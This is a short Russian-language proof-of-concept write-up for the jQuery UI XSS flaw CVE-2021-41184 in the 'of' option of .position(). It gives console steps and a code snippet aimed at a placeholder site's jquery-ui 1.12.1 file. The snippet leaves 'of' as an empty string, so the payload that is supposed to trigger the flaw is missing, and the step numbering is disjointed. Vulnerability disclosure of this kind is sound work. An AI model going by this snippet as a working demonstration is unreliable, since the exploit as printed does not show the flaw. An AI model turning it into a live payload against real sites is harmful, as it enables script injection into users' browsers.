
Эксплойт proof-of-concept для CVE-2021-41184 — уязвимости межсайтового скриптинга (XSS) в утилите .position() библиотеки jQuery UI, затрагивающей версию 1.12.1.
Эксплойт среднего уровня CVE-2021-41184: XSS в опции of утилиты .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Подтверждение концепции---------------------------------------------------------------
Откройте URL
Откройте инспектор
Найдите какой-нибудь ID в элементах сайта
3.1 #ID
Перейдите на вкладку «Консоль»
Вставьте скрипт с ID, выбранным в пункте 3.1
5.1 Скрипт
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});